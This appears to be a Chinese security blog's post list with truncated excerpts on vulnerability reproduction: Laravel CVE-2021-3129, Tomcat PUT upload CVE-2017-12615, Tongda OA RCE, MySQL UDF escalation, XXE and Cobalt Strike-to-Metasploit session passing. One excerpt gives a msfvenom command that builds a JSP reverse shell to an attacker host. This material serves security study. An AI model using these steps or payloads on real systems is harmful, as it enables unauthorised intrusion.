- 博客(9)
- 收藏
- 关注
原创 Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
访问Laravel访问/_ignition/execute-solution 抓包会出现如下页面2. 检测修改为POST,添加内容并且修改Content-Type: application/json{ "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
2021-12-07 17:02:03 1524 1
原创 Tomcat put任意文件上传
1.Tomcat8.5.19漏洞PUT方法任意写文件漏洞(CVE-2017-12615)打开burp尝试put方法任意文件上传抓取页面,然后将Get方法改成PUT,注意文件名要/文件名/,然后内容直接空一行写在下面,返回201。冰蝎连接也可以使用msf生成jsp的木马进行连接msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=端口 -f raw > shell.jsp然后msf设置监听访问最后就是使用现有的exp我
2021-09-10 17:07:49 1312
原创 子域名爆破+端口扫描脚本
子域名爆破+端口扫描脚本因为端口扫描使用的nmap库所以请先安装nmap写来玩玩因为没加多线程有点拉跨import requestsimport nmapimport socket##子域名爆破def zym(url): dic=open('/home/zmumu/zymdic.txt',"r") ##字典 header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3
2021-09-10 16:57:26 505
原创 CS派生会话到MSF
1.CS 派生会话到MSF当我们CS上线后,先打开msf,启动监听模块然后在CS段设置一个监听主要两边的payload一定要对应的。然后选择需要派生的会话右击—>Spawn然后msf端等待上线就行了。
2021-01-04 15:09:43 917
原创 通达OA远程命令执行+任意用户登录漏洞复现
通达OA漏洞复现环境搭建https://pan.baidu.com/s/1m0MyzHVaYOfTOR3LaekVgQ提取码:jvcj1. 任意用户登录影响版本:通达OA2017,V11.X<V11.5通达oa远程命令执行影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版首先开启burp抓取登入页面数据包2. 修改数据包1. 修改路径为 `logincheck.php``为``logincheck_code.php`。2. 删除Cook
2020-12-17 10:21:16 1349
原创 Mysql—udf实战提权
环境靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/raven : 192.168.1.24kali: 192.168.1.23信息搜集1.开放端口情况访问一下目标80端口,是一个安全的网站。经过番信息收集,在源码处发现该站点可能是基于wordpress搭建的。...
2020-10-18 00:28:39 1267 1
原创 XXE漏洞原理及防御
1.XXE漏洞XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞,xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。2.什么是xml1.XML 指可扩展标记语言(EXtensible Markup Language)是被设计用来传输和存储数据,而HTML则是被设计用来显示数据。...
2020-07-13 16:36:00 1996
原创 域环境的搭建
域环境 内网渗透测试,很大的程度上就是域渗透测试。搭建域环境 这里使用Windows Server 2012 R2搭建windwos域环境Windows Server 2012 R2Windows Server 2008 R2windows 7安装Windows Server 2012 R2设置服务器 在虚拟机安装完成后,设置其IP地址为192.168.1.12、...
2020-06-05 12:07:00 1058
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人